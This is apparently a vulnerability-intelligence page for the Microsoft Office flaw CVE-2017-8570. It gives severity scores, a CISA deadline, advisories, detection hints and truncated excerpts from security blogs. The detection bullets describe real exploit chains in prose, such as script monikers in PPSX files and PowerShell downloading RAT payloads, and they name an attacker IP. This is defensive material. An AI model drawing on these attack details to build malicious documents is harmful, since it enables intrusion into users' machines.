CVE-2017-8570
published 2017-07-11CVE-2017-8570: Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution…
PriorityP185high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-08-25
Exploited in the wild
EPSS
89.89%
99.8th percentile
Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | business_productivity_servers | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | web_applications | — | — |
| msrc | microsoft_office_2007_service_pack_3 | — | — |
| msrc | microsoft_office_2010_service_pack_2 | — | — |
| msrc | microsoft_office_2013_rt_service_pack_1 | — | — |
| msrc | microsoft_office_2013_service_pack_1 | — | — |
| msrc | microsoft_office_2016 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →The malicious PPSX file exploiting CVE-2017-8570 (actually CVE-2017-0199) triggers a script moniker embedded in ppt/slides/_rels/slide1.xml.rels; hunt for PPSX files containing script monikers in that relationship file path. ↗
- →The exploit payload (logo.doc) is not a Word document but an XML file containing JavaScript that spawns PowerShell to download and execute RATMAN.EXE; detect PowerShell child processes spawned from PowerPoint (POWERPNT.EXE). ↗
- →Patchwork group used PPSX files exploiting CVE-2017-8570 to download a malicious Windows Script Component (SCT) file from attacker-controlled servers and deliver xRAT malware; monitor for PPSX attachments that initiate outbound SCT/scriptlet downloads. ↗
- →Agent Tesla campaigns leverage CVE-2017-8570 via specially-crafted Office documents; detect Office processes spawning unexpected child processes or network connections after opening .doc/.docx/.rtf files. ↗
- →The PPSX exploit file displays the text 'CVE-2017-8570' as a decoy while actually exploiting CVE-2017-0199; this mislabeling is a toolkit artifact that can be used as a lure-content indicator in sandbox analysis. ↗
- ·The PPSX sample analyzed by Trend Micro displays 'CVE-2017-8570' as on-screen text but actually exploits CVE-2017-0199; IOCs from this sample (hashes, IPs, URLs) are associated with a CVE-2017-0199 exploit chain, not a pure CVE-2017-8570 chain. ↗
- ·The 192.166.218.230 IP is described as a VPN or hosting service abused by the attacker, meaning it may be shared infrastructure and not exclusively malicious. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
vendor_msrc7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-c2m8-mp3j-qvvc: Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Exec
ghsa_unreviewed·2022-05-17·CVSS 7.8
CVE-2017-0243 [HIGH] CWE-119 GHSA-c2m8-mp3j-qvvc: Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Exec
Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-8570.
GHSA
GHSA-p72w-9mwc-fgvp: Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Exec
ghsa_unreviewed·2022-05-13·CVSS 7.8
CVE-2017-8570 [HIGH] GHSA-p72w-9mwc-fgvp: Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Exec
Microsoft Office allows a remote code execution vulnerability due to the way that it handles objects in memory, aka "Microsoft Office Remote Code Execution Vulnerability". This CVE ID is unique from CVE-2017-0243.
VulnCheck
Microsoft Office Remote Code Execution Vulnerability
vulncheck·2017·CVSS 7.8
CVE-2017-8570 [HIGH] Microsoft Office Remote Code Execution Vulnerability
Microsoft Office Remote Code Execution Vulnerability
A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf; https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/; https://ti.qianxin.com/blog/articles/latest-activity-of-apt-c-35/; https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html; https://www.recordedfuture.com/blog/top-vulnerabilities-2018; https://www.antiy.cn/research/notice&report/research_report/20200522.html; https://www.anomali.com/blog/ba
CISA
Microsoft Office Remote Code Execution Vulnerability
cisa·2022-02-25·CVSS 7.8
CVE-2017-8570 [HIGH] Microsoft Office Remote Code Execution Vulnerability
Vulnerability: Microsoft Office Remote Code Execution Vulnerability
Affected: Microsoft Office
A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-8570
Remediation Due Date: 2022-08-25
Microsoft
Microsoft Office Remote Code Execution Vulnerability
vendor_msrc·2017-07-11·CVSS 7.8
CVE-2017-8570 [HIGH] Microsoft Office Remote Code Execution Vulnerability
Microsoft Office Remote Code Execution Vulnerability
Description: A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could use a specially crafted file to perform actions in the security context of the current user. For example, the file could then take actions on behalf of the logged-on user with the same permissions as the current user.
To exploit the vulnerability, a user must open a specially crafted file with an affected version of Microsoft Office software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an
No detection rules found.
Securelist
PC malware statistics, Q3 2023
blogs_securelist·2023-12-01
PC malware statistics, Q3 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2023
- IT threat evolution in Q3 2023. Non-mobile statistics
- IT threat evolution in Q3 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2023:
- Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe.
- A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus
Securelist
IT threat evolution in Q3 2023. Non-mobile statistics
blogs_securelist·2023-12-01
IT threat evolution in Q3 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Vulnerability exploitation
More attacks on healthcare
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT honeypots
Attacks via web resources
Countries and territories that serve as sourc
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Securelist
IT threat evolution in Q2 2023. Non-mobile statistics
blogs_securelist·2023-08-30
IT threat evolution in Q2 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
MOVEit Transfer vulnerabilities exploited
Attacks on municipal organizations, educational and healthcare establishments
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT
Securelist
PC malware statistics, Q2 2022
blogs_securelist·2023-08-30
PC malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2023
- IT threat evolution in Q2 2023. Non-mobile statistics
- IT threat evolution in Q2 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2023:
- Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe.
- A total of 209,716,810 unique links were d
Qualys
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
blogs_qualys·2023-07-18
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
## Table of Contents
Top Ten Vulnerabilities Exploited by Threat Actors
Top Ten Highly Active Threat Actors
Top Ten Most Exploited Vulnerabilities by Malware
Top Ten Most Active Malware
Top Ten Vulnerabilities Exploited by Ransomware
Prioritizing Exploited Vulnerabilities with TheQualys VMDR and TruRisk
Assess Your Organizations Exposure to Risk / TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Securelist
Non-mobile malware statistics, Q1 2023
blogs_securelist·2023-06-07
Non-mobile malware statistics, Q1 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2023
- IT threat evolution in Q1 2023. Non-mobile statistics
- IT threat evolution in Q1 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2023:
- Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
- Web Anti-Virus detected 246,912,694 unique URLs.
- Attempts to run malware fo
Securelist
IT threat evolution in Q1 2023. Non-mobile statistics
blogs_securelist·2023-06-07
IT threat evolution in Q1 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Attacks on Linux and VMWare ESXi servers
Progress in combating cybercrime
Conti-based Trojan decrypted
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries/territories
Tenable
Cybersecurity Snapshot: 6 Things That Matter Right Now
blogs_tenable·2022-08-19
Cybersecurity Snapshot: 6 Things That Matter Right Now
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
IT threat evolution in Q2 2022. Non-mobile statistics
blogs_securelist·2022-08-15
IT threat evolution in Q2 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
TOP 10 countries and territories that serve as sources of web-based attacks
Countries and territories where users faced the greatest risk of online infection
Local threat
Securelist
Non-mobile malware statistics, Q2 2022
blogs_securelist·2022-08-15
Non-mobile malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2022
- IT threat evolution in Q2 2022. Non-mobile statistics
- IT threat evolution in Q2 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2022:
- Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.
- Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware fo
Tenable
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
blogs_tenable·2022-08-04
Analyzing the Vulnerabilities Associated with the Top Malware Strains of 2021
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
IT threat evolution in Q1 2022. Non-mobile statistics
blogs_securelist·2022-05-27
IT threat evolution in Q1 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
TOP 10 banking malware families
Ransomware programs
Quarterly trends and highlights
Law enforcement successes
HermeticWiper, HermeticRansom and RUransom, etc.
Conti source-code leak
Attacks on NAS devices
Maze Decryptor
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarter highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat
Securelist
PC malware statistics, Q1 2022
blogs_securelist·2022-05-27
PC malware statistics, Q1 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2022
- IT threat evolution in Q1 2022. Non-mobile statistics
- IT threat evolution in Q1 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2022:
- Kaspersky solutions blocked 1,216,350,437 attacks from online resources across the globe.
- Web Anti-Virus recognized 313,164,030 unique URLs as malicious.
- Attempts to run malware
Securelist
IT threat evolution in Q3 2021. PC statistics
blogs_securelist·2021-11-26
IT threat evolution in Q3 2021. PC statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Attack on Kaseya and the REvil story
The arrival of BlackMatter: DarkSide restored?
Q3 closures
Exploitation of vulnerabilities and new attack methods
Number of new ransomware modifications
Number of users attacked by ransomware Trojans
Geography of ransomware attacks
Top 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by cybercriminals during cyberattacks
Quarter highlights
Statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries tha
Securelist
IT threat evolution in Q3 2021. PC statistics
blogs_securelist·2021-11-26
IT threat evolution in Q3 2021. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Number of users attacked by ransomware Trojans
- Geography of ransomware attacks
- Top 10 most common families of ransomware Trojans
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution Q3 2021
- IT threat evolution in Q3 2021. PC statistics
- IT threat evolution in Q3 2021. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2021:
- Kaspersky solutions blocked 1,098,968,315 attacks from online reso
Securelist
IT threat evolution in Q2 2021. PC statistics
blogs_securelist·2021-08-12
IT threat evolution in Q2 2021. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
These statistics are based on detection verdicts of Kaspersky products received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2021:
- Kaspersky solutions blocked 1,686,025,551 attacks from online resources across the globe.
- Web antivirus recognized 675,832,360 unique URLs as malicious.
- Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 119,252 unique users.
- Ransomware attacks were defeated on the computers
Securelist
IT threat evolution Q3 2020. Non-mobile statistics
blogs_securelist·2020-11-20
IT threat evolution Q3 2020. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Attack geography
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Attack geography
Miners
Number of new modifications
Number of users attacked by miners
Attack geography
Vulnerable applications used by cybercriminals during cyberattacks
Attacks on macOS
Threat geography
IoT attacks
IoT threat statistics
Attacks via web resources
Countries that are sources of web-based attacks: Top 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Authors
Victor Chebyshev
Fedor Sinitsyn
Denis Parinov
Oleg Kupreev
Evgeny Lopati
Securelist
IT threat evolution Q3 2020. Non-mobile statistics
blogs_securelist·2020-11-20
IT threat evolution Q3 2020. Non-mobile statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Evgeny Lopatin
- Alexey Kulaev
- Alexander Kolesnikov
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3:
- Kaspersky solutions blocked 1,416,295,227 attacks launched from online resources across the globe.
- 456,573,467 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempts to run malware for stealing
Talos
Lemon Duck brings cryptocurrency miners back into the spotlight
blogs_talos·2020-10-13
Lemon Duck brings cryptocurrency miners back into the spotlight
By Vanja Svajcer, with contributions from Caitlin Huey.
- We are used to ransomware attacks and big-game hunting making headlines, but there are still methods adversaries use to monetize their efforts in less intrusive ways.
- Cisco Talos recently recorded increased activity of the Lemon Duck cryptocurrency-mining botnet using several techniques likely to be spotted by defenders, but are not immediately obvious to end-users.
- These threats demonstrate several techniques of the MITRE ATT&CK framework, most notably T1203 (Exploitation for Client Execution), T1089 (Disabling Security Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086 (PowerShell), T1035 (Service Execution), T1021.002 (Remote Services: SMB/Windows Admin Shares), T1053 (Scheduled Task), T1562.004
Securelist
IT threat evolution Q2 2020. PC statistics
blogs_securelist·2020-09-03
IT threat evolution Q2 2020. PC statistics
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyberattacks
- Attacks on Apple macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Evgeny Lopatin
- Fedor Sinitsyn
- Denis Parinov
- Oleg Kupreev
- Alexey Kulaev
- Alexander Kolesnikov
IT threat evolution Q2 2020. Review
IT threat evolution Q2 2020. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2:
- Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.
- As many as 286,
Securelist
IT threat evolution Q2 2020. PC statistics
blogs_securelist·2020-09-03
IT threat evolution Q2 2020. PC statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trend highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacks
Top 10 most common families of ransomware Trojans
Miners
Number of new modifications
Number of users attacked by miners
Geography of attacks
Vulnerable applications used by cybercriminals during cyberattacks
Attacks on Apple macOS
Threat geography
IoT attacks
IoT threat statistics
Threats loaded into traps
Attacks via web resources
Countries that are sources of web-based attacks: TOP 10
Countries where users faced the greatest risk of online infection
Local threats
Countries where users faced the highest risk of local infection
Authors
Victor
Sentinelone
Agent Tesla | Old RAT Uses New Tricks to Stay on Top - SentinelLabs
blogs_sentinelone·2020-08-10
Agent Tesla | Old RAT Uses New Tricks to Stay on Top - SentinelLabs
As other researchers have recently noted, the Agent Tesla RAT (Remote Access Trojan) has become one of the most prevalent malware families threatening enterprises in the first half of 2020, being seen in more attacks than even TrickBot or Emotet and only slightly fewer than Dridex. Although the Agent Tesla RAT has been around for at least 6 years, it continues to adapt and evolve, defeating many organizations’ security efforts. During the COVID-19 pandemic new variants have been introduced with added functionality, and the malware has been widely used in Coronavirus-themed phishing campaigns.
## Agent Tesla | Background & Overview
Agent Tesla is, at its core, a keylogger and information stealer. First discovered in late 2014, there has been steady growth in the use of Agent Tesla over th
Sentinelone
Agent Tesla | Old RAT Uses New Tricks to Stay on Top
blogs_sentinelone·2020-08-10
Agent Tesla | Old RAT Uses New Tricks to Stay on Top
## Agent Tesla | Old RAT Uses New Tricks to Stay on Top
As other researchers have recently noted , the Agent Tesla RAT (Remote Access Trojan) has become one of the most prevalent malware families threatening enterprises in the first half of 2020, being seen in more attacks than even TrickBot or Emotet and only slightly fewer than Dridex. Although the Agent Tesla RAT has been around for at least 6 years, it continues to adapt and evolve, defeating many organizations’ security efforts. During the COVID-19 pandemic new variants have been introduced with added functionality, and the malware has been widely used in Coronavirus-themed phishing campaigns.
## Agent Tesla | Background & Overview
Agent Tesla is, at its core, a keylogger and information stealer. First discovered in late 2014, ther
Zscaler
G-Drive is tapped by a Multistage Malware Downloader | Blog
blogs_zscaler·2020-03-25
G-Drive is tapped by a Multistage Malware Downloader | Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
Qualys
Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
blogs_qualys·2019-12-27·CVSS 8.8
[HIGH] Top 19+ Vulnerability CVEs in Santa’s Dashboard Tracking | Qualys
A recent report identified 19+ vulnerabilities that should be mitigated by end of year 2019. These are a range of top vulnerabilities attacked and leveraged by Advance Persistent Threat (APT) actors from all parts of the world.
The list below shows those top 19 vulnerabilities, and it should be no surprise that you can easily track and remediate them via a dashboard within Qualys. Import the dashboard into your subscription for easy insight into what assets and vulnerabilities in your organization are at risk.
No.
CVE
Products Affected by CVE
CVSS Score (NVD)
Examples of Threat Actors
1
CVE-2017-11882
Microsoft Office
7.8
APT32 (Vietnam), APT34 (Iran), APT40 (China), APT-C-35 (India), Cobalt Group (Spain, Ukraine), Silent Group (Russia), Lotus Blossom (China), FIN7 (Russia)
2
CVE-2018-
Securelist
IT threat evolution Q2 2019. Statistics
blogs_securelist·2019-08-19
IT threat evolution Q2 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals during cyber attacks
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.
- 217,843,293 unique URLs triggered Web Anti-Virus components.
- Attempted infections by malware designed to steal money via online access to bank accounts were
Securelist
IT threat evolution Q1 2019. Statistics
blogs_securelist·2019-05-23
IT threat evolution Q1 2019. Statistics
Table of Contents
- Quarterly figures
- Mobile threats
- Attacks on Apple macOS
- IoT attacks
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by cybercriminals
- Attacks via web resources
- Local threats
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
- 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed t
Sentinelone
FormBook Anti-Analysis Techniques and Indicators of Compromise
blogs_sentinelone·2019-05-02·CVSS 7.8
CVE-2017-8570 [HIGH] FormBook Anti-Analysis Techniques and Indicators of Compromise
FormBook is yet another Stealer malware. Like most stealer malware, it performs many operations to evade AV vendors when deploying itself on a victim’s machine. And of course as we see with Ursnif, Hancitor, Dridex and other trojans, there are many variants with more than one way to receive the payload.
In the past year the threat actor’s favorite method of distributing FormBook has been via malspam and the use of CVE-2017-8570, using an `.RTF` file format with malicious code to exploit this vulnerability.
In this article, I will focus on the payload and elaborate on the behavior and IOCs of the malware.
## FormBook Anti-Analysis Techniques
Let’s start with FormBook’s attempts to prevent malware researchers from debugging and analysing the malware. From research done by others, we know
Zscaler
The Top 10 ThreatLabZ blogs from 2018 | Zscaler
blogs_zscaler·2018-12-31
The Top 10 ThreatLabZ blogs from 2018 | Zscaler
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
